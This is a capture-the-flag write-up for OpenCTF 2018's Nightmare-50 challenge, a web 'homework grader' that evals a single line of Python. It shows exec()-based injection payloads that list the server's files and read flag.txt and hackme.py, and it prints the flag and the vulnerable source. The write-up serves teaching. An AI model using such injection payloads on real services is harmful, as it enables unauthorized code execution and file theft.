OpenCTF 2018: Challenge 24 (Nightmare-50)
Challenge text:
Nightmare-50 50 ---
Automated home work scoring my ass. https://shades-of-nightmare.openctf.com/nzpoixyucvkjwnerntasdfascdvasdfqwerqwe/nightmare-50/
This website hosts a 'homework grading' application as an Xterm.js/Gotty webapp:
Welcome to Doctor Professor Wilson's Python 101!
Lesson 1: hello world
Enter homework for grading:
Here we can enter a single line of Python code which turns out to be evaled. We'll first want to explore the filesystem. Because we can only use a single line and Python doesn't support multiple statements on a single line, we have to resort to some trickery with exec:
exec("import os;\nprint(os.listdir('.'))")This gives us:
['lib64', 'lib', 'sys', 'mnt', 'home', 'bin', 'var', 'usr', 'tmp', 'media', 'proc', 'boot', 'sbin', 'dev', 'run', 'opt', 'etc', 'root', 'srv', '.dockerenv', 'entry.sh', 'requirements.txt', 'flag.txt', 'hackme.py']
We assume the flag is in flag.txt and read this:
exec("with open('flag.txt', 'r') as f:\n print(f.read())")And this returns the flag: ThisIsAVeryFl@ggyFlag
As a bonus, we can also extract the contents of hackme.py:
exec("with open('hackme.py', 'r') as f:\n print(f.read())")hackme.py:
import sys
# no traceback
sys.tracebacklimit = 0
env=dict(locals=None,globals=None, __name__=None,print=print,__file__=None)
print("Welcome to Doctor Professor Wilson's Python 101!")
print("Lesson 1: hello world")
inject = input("Enter homework for grading:\n")
eval(inject, env)